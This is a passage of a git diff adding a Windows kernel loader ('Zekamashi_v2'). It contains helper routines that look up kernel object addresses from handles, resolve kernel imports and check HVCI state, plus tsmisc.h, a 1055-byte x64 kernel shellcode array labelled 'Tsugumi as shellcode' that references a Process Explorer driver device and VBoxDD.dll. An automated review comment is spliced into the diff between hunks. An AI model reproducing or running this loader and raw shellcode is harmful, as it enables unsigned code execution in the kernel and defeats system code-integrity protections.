supGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = supGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } +} + +/* +* supDetectObjectCallback +* +* Purpose: +* +* Comparer callback routine used in objects enumeration. +* +*/ +NTSTATUS NTAPI supDetectObjectCallback( + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam +) +{ + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } + + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } + + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; +} + +/* +* supEnumSystemObjects +* +* Purpose: +* +* Lookup object by name in given directory. +* +*/ +NTSTATUS NTAPI supEnumSystemObjects( + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam +) +{ + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; + + POBJECT_DIRECTORY_INFORMATION objinf; + + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } + + status = STATUS_UNSUCCESSFUL; + + __try { + + // We can use root directory. + if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } + + // Enumerate objects in directory. 
+ ctx = 0; + do { + + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; + + objinf = (POBJECT_DIRECTORY_INFORMATION)supHeapAlloc(rlen); + if (objinf == NULL) + break; + + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + supHeapFree(objinf); + break; + } + + CallbackStatus = CallbackProc(objinf, CallbackParam); + + supHeapFree(objinf); + + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } + + } while (TRUE); + + if (hDirectory != NULL) { + NtClose(hDirectory); + } + + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } + + return status; +} + +/* +* supIsObjectExists +* +* Purpose: +* +* Return TRUE if the given object exists, FALSE otherwise. +* +*/ +BOOLEAN supIsObjectExists( + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +) +{ + OBJSCANPARAM Param; + + if (ObjectName == NULL) { + return FALSE; + } + + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); + + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); +} + +/* +* supQueryObjectFromHandle +* +* Purpose: +* +* Return object kernel address from handle in current process handle table. 
+* +*/ +BOOL supQueryObjectFromHandle( + _In_ HANDLE hOject, + _Out_ ULONG_PTR* Address +) +{ + BOOL bFound = FALSE; + ULONG i; + DWORD CurrentProcessId = GetCurrentProcessId(); + + PSYSTEM_HANDLE_INFORMATION_EX pHandles; + + if (Address) + *Address = 0; + else + return FALSE; + + pHandles = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation); + if (pHandles) { + for (i = 0; i < pHandles->NumberOfHandles; i++) { + if (pHandles->Handles[i].UniqueProcessId == CurrentProcessId) { + if (pHandles->Handles[i].HandleValue == (USHORT)(ULONG_PTR)hOject) { + *Address = (ULONG_PTR)pHandles->Handles[i].Object; + bFound = TRUE; + break; + } + } + } + supHeapFree(pHandles); + } + return bFound; +} + +/* +* supGetCommandLineOption +* +* Purpose: +* +* Parse command line options. +* +*/ +BOOL supGetCommandLineOption( + _In_ LPCTSTR OptionName, + _In_ BOOL IsParametric, + _Out_writes_opt_z_(ValueSize) LPTSTR OptionValue, + _In_ ULONG ValueSize +) +{ + LPTSTR cmdline = GetCommandLine(); + TCHAR Param[MAX_PATH + 1]; + ULONG rlen; + int i = 0; + + RtlSecureZeroMemory(Param, sizeof(Param)); + while (GetCommandLineParam(cmdline, i, Param, MAX_PATH, &rlen)) + { + if (rlen == 0) + break; + + if (_strcmp(Param, OptionName) == 0) + { + if (IsParametric) + return GetCommandLineParam(cmdline, i + 1, OptionValue, ValueSize, &rlen); + + return TRUE; + } + ++i; + } + + return 0; +} + +/* +* supQueryHVCIState +* +* Purpose: +* +* Query HVCI/IUM state. 
+* +*/ +BOOLEAN supQueryHVCIState( + _Out_ PBOOLEAN pbHVCIEnabled, + _Out_ PBOOLEAN pbHVCIStrictMode, + _Out_ PBOOLEAN pbHVCIIUMEnabled +) +{ + BOOLEAN hvciEnabled; + ULONG ReturnLength; + SYSTEM_CODEINTEGRITY_INFORMATION CodeIntegrity; + + if (pbHVCIEnabled) *pbHVCIEnabled = FALSE; + if (pbHVCIStrictMode) *pbHVCIStrictMode = FALSE; + if (pbHVCIIUMEnabled) *pbHVCIIUMEnabled = FALSE; + + CodeIntegrity.Length = sizeof(CodeIntegrity); + if (NT_SUCCESS(NtQuerySystemInformation( + SystemCodeIntegrityInformation, + &CodeIntegrity, + sizeof(CodeIntegrity), + &ReturnLength))) + { + hvciEnabled = ((CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_ENABLED) && + (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED)); + + *pbHVCIEnabled = hvciEnabled; + + *pbHVCIStrictMode = hvciEnabled && + (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED); + + *pbHVCIIUMEnabled = (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED) > 0; + + return TRUE; + } + + return FALSE; +} + +/* +* supExpandEnvironmentStrings +* +* Purpose: +* +* Reimplemented ExpandEnvironmentStrings. +* +*/ +DWORD supExpandEnvironmentStrings( + _In_ LPCWSTR lpSrc, + _Out_writes_to_opt_(nSize, return) LPWSTR lpDst, + _In_ DWORD nSize +) +{ + NTSTATUS Status; + SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize; + + if (lpSrc) { + SrcLength = _strlen(lpSrc); + } + + Status = RtlExpandEnvironmentStrings( + NULL, + (PWSTR)lpSrc, + SrcLength, + (PWSTR)lpDst, + DstLength, + &ReturnLength); + + if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) { + + if (ReturnLength <= MAXDWORD32) + return (DWORD)ReturnLength; + + Status = STATUS_UNSUCCESSFUL; + } + RtlSetLastWin32Error(RtlNtStatusToDosError(Status)); + return 0; +} + +/* +* supQueryMaximumUserModeAddress +* +* Purpose: +* +* Return maximum user mode address. 
+* +*/ +ULONG_PTR supQueryMaximumUserModeAddress() +{ + NTSTATUS ntStatus; + + SYSTEM_BASIC_INFORMATION basicInfo; + + ULONG returnLength = 0; + SYSTEM_INFO systemInfo; + + RtlSecureZeroMemory(&basicInfo, sizeof(basicInfo)); + + ntStatus = NtQuerySystemInformation(SystemBasicInformation, + &basicInfo, + sizeof(basicInfo), + &returnLength); + + if (NT_SUCCESS(ntStatus)) { + return basicInfo.MaximumUserModeAddress; + } + else { + + RtlSecureZeroMemory(&systemInfo, sizeof(systemInfo)); + GetSystemInfo(&systemInfo); + return (ULONG_PTR)systemInfo.lpMaximumApplicationAddress; + } + +} + +/* +* supFindPattern +* +* Purpose: +* +* Lookup pattern in buffer. +* +*/ +PVOID supFindPattern( + _In_ CONST PBYTE Buffer, + _In_ SIZE_T BufferSize, + _In_ CONST PBYTE Pattern, + _In_ SIZE_T PatternSize +) +{ + PBYTE p0 = Buffer, pnext; + + if (PatternSize == 0) + return NULL; + + if (BufferSize < PatternSize) + return NULL; + + do { + pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize); + if (pnext == NULL) + break; + + BufferSize -= (ULONG_PTR)(pnext - p0); + + if (BufferSize < PatternSize) + return NULL; + + if (memcmp(pnext, Pattern, PatternSize) == 0) + return pnext; + + p0 = pnext + 1; + --BufferSize; + } while (BufferSize > 0); + + return NULL; +} + +/* +* supGetCurrentProcessToken +* +* Purpose: +* +* Return current process token value with TOKEN_QUERY access right. +* +*/ +HANDLE supGetCurrentProcessToken( + VOID) +{ + HANDLE hToken = NULL; + + if (NT_SUCCESS(NtOpenProcessToken( + NtCurrentProcess(), + TOKEN_QUERY, + &hToken))) + { + return hToken; + } + return NULL; +} + +/* +* supUserIsFullAdmin +* +* Purpose: +* +* Tests if the current user is admin with full access token. 
+* +*/ +BOOL supUserIsFullAdmin( + VOID +) +{ + BOOL bResult = FALSE; + HANDLE hToken = NULL; + NTSTATUS status; + DWORD i, Attributes; + ULONG ReturnLength = 0; + + PTOKEN_GROUPS pTkGroups; + + SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; + PSID AdministratorsGroup = NULL; + + hToken = supGetCurrentProcessToken(); + if (hToken == NULL) + return FALSE; + + do { + if (!NT_SUCCESS(RtlAllocateAndInitializeSid( + &NtAuthority, + 2, + SECURITY_BUILTIN_DOMAIN_RID, + DOMAIN_ALIAS_RID_ADMINS, + 0, 0, 0, 0, 0, 0, + &AdministratorsGroup))) + { + break; + } + + status = NtQueryInformationToken(hToken, TokenGroups, NULL, 0, &ReturnLength); + if (status != STATUS_BUFFER_TOO_SMALL) + break; + + pTkGroups = (PTOKEN_GROUPS)supHeapAlloc((SIZE_T)ReturnLength); + if (pTkGroups == NULL) + break; + + status = NtQueryInformationToken(hToken, TokenGroups, pTkGroups, ReturnLength, &ReturnLength); + if (NT_SUCCESS(status)) { + if (pTkGroups->GroupCount > 0) + for (i = 0; i < pTkGroups->GroupCount; i++) { + Attributes = pTkGroups->Groups[i].Attributes; + if (RtlEqualSid(AdministratorsGroup, pTkGroups->Groups[i].Sid)) + if ( + (Attributes & SE_GROUP_ENABLED) && + (!(Attributes & SE_GROUP_USE_FOR_DENY_ONLY)) + ) + { + bResult = TRUE; + break; + } + } + } + supHeapFree(pTkGroups); + + } while (FALSE); + + if (AdministratorsGroup != NULL) { + RtlFreeSid(AdministratorsGroup); + } + + NtClose(hToken); + return bResult; +} + +/* +* supQueryTokenUserSid +* +* Purpose: +* +* Return SID of given token. +* +* Use supHeapFree to free memory allocated for result. 
+* +*/ +PSID supQueryTokenUserSid( + _In_ HANDLE ProcessToken +) +{ + PSID resultSid = NULL; + PTOKEN_USER ptu; + NTSTATUS status; + ULONG sidLength = 0, allocLength; + + status = NtQueryInformationToken( + ProcessToken, + TokenUser, + NULL, 0, &sidLength); + + if (status == STATUS_BUFFER_TOO_SMALL) { + + ptu = (PTOKEN_USER)supHeapAlloc(sidLength); + + if (ptu) { + + status = NtQueryInformationToken( + ProcessToken, + TokenUser, + ptu, + sidLength, + &sidLength); + + if (NT_SUCCESS(status)) { + + allocLength = SECURITY_MAX_SID_SIZE; + if (sidLength > allocLength) + allocLength = sidLength; + + resultSid = (PSID)supHeapAlloc(allocLength); + if (resultSid) { + + status = RtlCopySid( + allocLength, + resultSid, + ptu->User.Sid); + + } + } + + supHeapFree(ptu); + } + } + + return (NT_SUCCESS(status)) ? resultSid : NULL; +} + +/* +* supGetTokenInfo +* +* Purpose: +* +* Returns buffer with token information by given TokenInformationClass. +* +* Returned buffer must be freed with supHeapFree after usage. +* +*/ +PVOID supGetTokenInfo( + _In_ HANDLE TokenHandle, + _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, + _Out_opt_ PULONG ReturnLength +) +{ + PVOID Buffer = NULL; + ULONG returnLength = 0; + + if (ReturnLength) + *ReturnLength = 0; + + NtQueryInformationToken(TokenHandle, + TokenInformationClass, + NULL, + 0, + &returnLength); + + Buffer = supHeapAlloc((SIZE_T)returnLength); + if (Buffer) { + + if (NT_SUCCESS(NtQueryInformationToken(TokenHandle, + TokenInformationClass, + Buffer, + returnLength, + &returnLength))) + { + if (ReturnLength) + *ReturnLength = returnLength; + return Buffer; + } + else { + supHeapFree(Buffer); + return NULL; + } + } + + return Buffer; +} diff --git a/Source/Zekamashi_v2/loader/sup.h b/Source/Zekamashi_v2/loader/sup.h new file mode 100644 index 0000000..069a5b2 --- /dev/null +++ b/Source/Zekamashi_v2/loader/sup.h 
@@ -0,0 +1,133 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
+*
+* TITLE: SUP.H
+*
+* VERSION: 2.00
+*
+* DATE: 24 Jan 2020
+*
+* Common header file for the program support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+typedef NTSTATUS(NTAPI* PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+
+typedef struct _OBJSCANPARAM {
+ PWSTR Buffer;
+ ULONG BufferSize;
+} OBJSCANPARAM, * POBJSCANPARAM;
+
+BOOLEAN supIsObjectExists(
+ _In_ LPWSTR RootDirectory,
+ _In_ LPWSTR ObjectName);
+
+PVOID supHeapAlloc(
+ _In_ SIZE_T Size);
+
+BOOL supHeapFree(
+ _In_ PVOID Memory);
+
+BOOL supRegDeleteKeyRecursive(
+ _In_ HKEY hKeyRoot,
+ _In_ LPWSTR lpSubKey);
+
+NTSTATUS supLoadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ LPCWSTR DriverPath,
+ _In_ BOOLEAN UnloadPreviousInstance);
+
+NTSTATUS supUnloadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ BOOLEAN fRemove);
+
+NTSTATUS supOpenDriver(
+ _In_ LPCWSTR DriverName,
+ _Out_ PHANDLE DeviceHandle);
+
+NTSTATUS supEnablePrivilege(
+ _In_ DWORD Privilege,
+ _In_ BOOL Enable);
+
+VOID supPurgeSystemCache(
+ VOID);
+
+PVOID supGetSystemInfo(
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass);
+
+BOOL supProcessExist(
+ _In_ LPWSTR lpProcessName);
+
+BOOL supGetCommandLineOption(
+ _In_ LPCTSTR OptionName,
+ _In_ BOOL IsParametric,
+ _Out_writes_opt_z_(ValueSize) LPTSTR OptionValue,
+ _In_ ULONG ValueSize);
+
+BOOLEAN supQueryHVCIState(
+ _Out_ PBOOLEAN pbHVCIEnabled,
+ _Out_ PBOOLEAN pbHVCIStrictMode,
+ _Out_ PBOOLEAN pbHVCIIUMEnabled);
+
+DWORD supExpandEnvironmentStrings(
+ _In_ LPCWSTR lpSrc,
+ _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
+ _In_ DWORD nSize);
+
+void supResolveKernelImport(
+ _In_ ULONG_PTR Image,
+ _In_ ULONG_PTR KernelImage,
+ _In_ ULONG_PTR KernelBase);
+
+ULONG_PTR supGetProcAddress(
+ _In_ ULONG_PTR KernelBase,
+ _In_ ULONG_PTR KernelImage,
+ _In_ LPCSTR FunctionName);
+
+SIZE_T supWriteBufferToFile(
+ _In_ PWSTR lpFileName,
+ _In_ PVOID Buffer,
+ _In_ SIZE_T Size,
+ _In_ BOOL Flush,
+ _In_ BOOL Append,
+ _Out_opt_ NTSTATUS* Result);
+
+PBYTE supQueryResourceData(
+ _In_ ULONG_PTR ResourceId,
+ _In_ PVOID DllHandle,
+ _In_ PULONG DataSize);
+
+ULONG_PTR supGetNtOsBase(
+ VOID);
+
+BOOL supQueryObjectFromHandle(
+ _In_ HANDLE hOject,
+ _Out_ ULONG_PTR* Address);
+
+ULONG_PTR supQueryMaximumUserModeAddress();
+
+PVOID supFindPattern(
+ _In_ CONST PBYTE Buffer,
+ _In_ SIZE_T BufferSize,
+ _In_ CONST PBYTE Pattern,
+ _In_ SIZE_T PatternSize);
+
+HANDLE supGetCurrentProcessToken(
+ VOID);
+
+BOOL supUserIsFullAdmin(
+ VOID);
+
+PSID supQueryTokenUserSid(
+ _In_ HANDLE ProcessToken);
+
+PVOID supGetTokenInfo(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_opt_ PULONG ReturnLength);
diff --git a/Source/Zekamashi_v2/loader/tsmisc.h b/Source/Zekamashi_v2/loader/tsmisc.h
new file mode 100644
index 0000000..e0e0207
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/tsmisc.h
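Review bot: `ULONG_PTR supQueryMaximumUserModeAddress();` is the only prototype in sup.h with empty parentheses, which in C declares an unspecified parameter list rather than no parameters; every other no-argument routine here uses `(VOID)` (`supGetNtOsBase(VOID)`, `supUserIsFullAdmin(VOID)`), so it should read `ULONG_PTR supQueryMaximumUserModeAddress(VOID);`, and the definition in sup.c earlier in this diff has the same form. The three `_Out_ PBOOLEAN` parameters of `supQueryHVCIState` declare required outputs, while the sup.c body null-checks each pointer before zeroing it and then stores through all three unconditionally on success; either keep `_Out_` and drop the dead null checks, or change them to `_Out_opt_` and guard the later stores. `hOject` in `supQueryObjectFromHandle` looks like a typo for `hObject` and is repeated in the sup.c definition.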
@@ -0,0 +1,88 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2020 +* +* TITLE: TSMISC.H +* +* VERSION: 1.00 +* +* DATE: 24 Jan 2020 +* +* Tsugumi as shellcode. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#pragma once + +BYTE x64kernelcode[1055] = { + 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0xB8, 0x1A, 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13, + 0x48, 0x8B, 0xDA, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8D, 0x05, 0x51, 0x00, 0x00, 0x00, 0x48, + 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x83, 0x38, + 0x01, 0x74, 0x1A, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x48, 0x8D, 0x0D, 0x61, 0x02, 0x00, 0x00, 0xC7, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x38, 0xFF, 0x50, 0x48, 0x48, 0x8B, 0x44, + 0x24, 0x38, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0xC7, 0x43, 0x30, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x50, + 0x18, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, + 0x48, 0x89, 0x5C, 0x24, 0x18, 0x55, 0x48, 0x8B, 0xEC, 0x48, 0x83, 0xEC, 0x60, 0x48, 0xB8, 0x1A, + 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13, 0xC7, 0x45, 0xD0, 0x5C, 0x00, 0x44, 0x00, 0x48, 0x89, + 0x45, 0x10, 0x48, 0x8B, 0xD9, 0x33, 0xC0, 0xC7, 0x45, 0xD4, 0x6F, 0x00, 0x73, 0x00, 0x66, 0x89, + 0x45, 0xFC, 0x48, 0x8D, 0x0D, 0xF7, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x10, 0xC7, 0x45, 0xD8, + 0x44, 0x00, 0x65, 0x00, 0xC7, 0x45, 0xDC, 0x76, 0x00, 0x69, 0x00, 0xC7, 0x45, 0xE0, 0x63, 0x00, + 0x65, 0x00, 0xC7, 0x45, 0xE4, 0x73, 0x00, 0x5C, 0x00, 0xC7, 0x45, 0xE8, 0x50, 0x00, 0x52, 0x00, + 0xC7, 0x45, 0xEC, 0x4F, 0x00, 0x43, 0x00, 0xC7, 0x45, 0xF0, 0x45, 0x00, 0x58, 0x00, 0xC7, 0x45, + 0xF4, 0x50, 0x00, 0x31, 0x00, 0xC7, 
0x45, 0xF8, 0x35, 0x00, 0x32, 0x00, 0xFF, 0x50, 0x50, 0x48, + 0x8B, 0x45, 0x10, 0x48, 0x8D, 0x55, 0xD0, 0x48, 0x8D, 0x4D, 0xC0, 0xFF, 0x90, 0x80, 0x00, 0x00, + 0x00, 0x48, 0x8B, 0x45, 0x10, 0x48, 0x8D, 0x4D, 0xC0, 0xFF, 0x50, 0x30, 0x48, 0x8B, 0x45, 0x10, + 0x48, 0x8B, 0x4B, 0x08, 0xFF, 0x50, 0x28, 0x48, 0x8B, 0x45, 0x10, 0x48, 0xC7, 0x45, 0x18, 0x60, + 0x79, 0xFE, 0xFF, 0x83, 0x78, 0x04, 0x00, 0x74, 0x20, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8B, 0x45, 0x10, 0x4C, 0x8D, 0x45, 0x18, 0x33, 0xD2, 0x33, 0xC9, 0xFF, 0x50, 0x38, 0x48, + 0x8B, 0x45, 0x10, 0x83, 0x78, 0x04, 0x00, 0x75, 0xE7, 0x48, 0x8B, 0x45, 0x10, 0x4C, 0x8D, 0x45, + 0x18, 0x33, 0xD2, 0x33, 0xC9, 0xFF, 0x50, 0x38, 0x48, 0x8B, 0x9C, 0x24, 0x80, 0x00, 0x00, 0x00, + 0x48, 0x83, 0xC4, 0x60, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, + 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x57, + 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x41, 0x8B, 0xF1, 0x49, + 0x8B, 0xF8, 0x4C, 0x8B, 0xEA, 0x4C, 0x8B, 0xF9, 0x45, 0x33, 0xF6, 0x4C, 0x89, 0x74, 0x24, 0x20, + 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x8B, 0xD6, 0x48, 0x8B, 0xCF, 0x41, 0xFF, 0x57, 0x10, 0x48, + 0x8B, 0xD8, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xC0, 0x75, 0x0A, 0xB8, 0x9A, 0x00, 0x00, + 0xC0, 0xE9, 0xB3, 0x00, 0x00, 0x00, 0x48, 0xB8, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0x00, 0x00, + 0x48, 0x3B, 0xF8, 0x72, 0x0A, 0xB8, 0x18, 0x00, 0x00, 0xC0, 0xE9, 0x9A, 0x00, 0x00, 0x00, 0x45, + 0x33, 0xC0, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x70, 0xF6, 0x43, 0x0A, 0x05, 0x74, + 0x06, 0x4C, 0x8B, 0x63, 0x18, 0xEB, 0x20, 0xC7, 0x44, 0x24, 0x28, 0x20, 0x00, 0x00, 0x40, 0x44, + 0x89, 0x74, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x33, 0xD2, 0x45, 0x8D, 0x41, 0x01, 0x48, 0x8B, 0xCB, + 0x41, 0xFF, 0x57, 0x78, 0x4C, 0x8B, 0xE0, 0x4D, 0x85, 0xE4, 0x74, 0x31, 0xBA, 0x04, 0x00, 0x00, + 0x00, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x58, 0x44, 0x8B, 0xF0, 0x89, 
0x44, 0x24, 0x30, 0x48, + 0x8B, 0xCE, 0x49, 0x8B, 0xFC, 0x49, 0x8B, 0xF5, 0xF3, 0xA4, 0x48, 0x8B, 0xD3, 0x49, 0x8B, 0xCC, + 0x41, 0xFF, 0x57, 0x60, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x68, 0xEB, 0x0B, 0x41, 0xBE, 0x05, + 0x00, 0x00, 0xC0, 0x44, 0x89, 0x74, 0x24, 0x30, 0xEB, 0x15, 0x41, 0xBE, 0x05, 0x00, 0x00, 0xC0, + 0x44, 0x89, 0x74, 0x24, 0x30, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0x8B, 0x5C, 0x24, 0x38, 0x48, + 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x20, 0x41, 0x8B, 0xC6, 0x48, 0x8B, 0x5C, 0x24, 0x78, 0x48, 0x8B, + 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, + 0x41, 0x5C, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, + 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x6C, 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x83, + 0xEC, 0x40, 0x48, 0xB8, 0x1A, 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13, 0x49, 0x8B, 0xF0, 0x48, + 0x89, 0x44, 0x24, 0x60, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x4C, 0x8B, 0xF1, 0xF0, + 0xFF, 0x40, 0x04, 0x33, 0xFF, 0xC7, 0x44, 0x24, 0x20, 0x56, 0x00, 0x42, 0x00, 0xC7, 0x44, 0x24, + 0x24, 0x6F, 0x00, 0x78, 0x00, 0x8B, 0xDF, 0xC7, 0x44, 0x24, 0x28, 0x44, 0x00, 0x44, 0x00, 0xC7, + 0x44, 0x24, 0x2C, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x44, 0x24, 0x30, 0x6C, 0x00, 0x6C, 0x00, 0x66, + 0x89, 0x7C, 0x24, 0x34, 0x48, 0x85, 0xC9, 0x0F, 0x84, 0xF6, 0x00, 0x00, 0x00, 0x4D, 0x85, 0xC0, + 0x0F, 0x84, 0xED, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x60, 0xFF, 0x50, 0x40, 0x48, 0x3B, + 0xC5, 0x0F, 0x85, 0xDC, 0x00, 0x00, 0x00, 0x4D, 0x8B, 0x4E, 0x08, 0x4D, 0x85, 0xC9, 0x0F, 0x84, + 0xCF, 0x00, 0x00, 0x00, 0x41, 0x0F, 0xB7, 0x06, 0x66, 0x85, 0xC0, 0x0F, 0x84, 0xC2, 0x00, 0x00, + 0x00, 0x44, 0x8B, 0xC0, 0x8B, 0xCF, 0x41, 0xD1, 0xE8, 0x74, 0x1B, 0x49, 0x8B, 0xD1, 0x66, 0x90, + 0xFF, 0xC1, 0x66, 0x83, 0x3A, 0x5C, 0x48, 0x8D, 0x52, 0x02, 0x8B, 0xC1, 0x0F, 0x45, 0xC3, 0x8B, + 0xD8, 0x41, 0x3B, 0xC8, 0x72, 0xEA, 0x4C, 0x8B, 0x54, 0x24, 0x60, 0x48, 0x8D, 0x44, 0x24, 0x20, + 0x49, 0xC7, 
0xC0, 0xFF, 0xFF, 0xFF, 0xFF, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x49, 0xFF, 0xC0, 0x66, 0x42, 0x39, 0x3C, 0x40, 0x75, 0xF6, 0x8B, 0xC3, 0x48, 0x8D, 0x54, 0x24, + 0x20, 0x49, 0x8D, 0x0C, 0x41, 0x41, 0xFF, 0x52, 0x08, 0x85, 0xC0, 0x75, 0x66, 0x48, 0x8B, 0x5C, + 0x24, 0x60, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x81, 0xC3, 0x8C, 0x00, 0x00, 0x00, 0x83, 0xB8, + 0x88, 0x00, 0x00, 0x00, 0x05, 0x76, 0x4C, 0x0F, 0xB6, 0x4B, 0x04, 0x84, 0xC9, 0x74, 0x1C, 0x44, + 0x8B, 0x03, 0x48, 0x8D, 0x53, 0x05, 0x4C, 0x03, 0x46, 0x08, 0x44, 0x8B, 0xC9, 0x48, 0x8B, 0x4C, + 0x24, 0x60, 0xE8, 0x99, 0xFD, 0xFF, 0xFF, 0x0F, 0xB6, 0x4B, 0x04, 0x0F, 0xB6, 0xC1, 0x83, 0xC0, + 0x05, 0x03, 0xF8, 0x0F, 0xB6, 0xC1, 0x48, 0x83, 0xC0, 0x05, 0x48, 0x03, 0xD8, 0x48, 0x8B, 0x44, + 0x24, 0x60, 0x8B, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8B, 0xC7, 0x48, 0x83, 0xC0, 0x05, 0x48, 0x3B, + 0xC1, 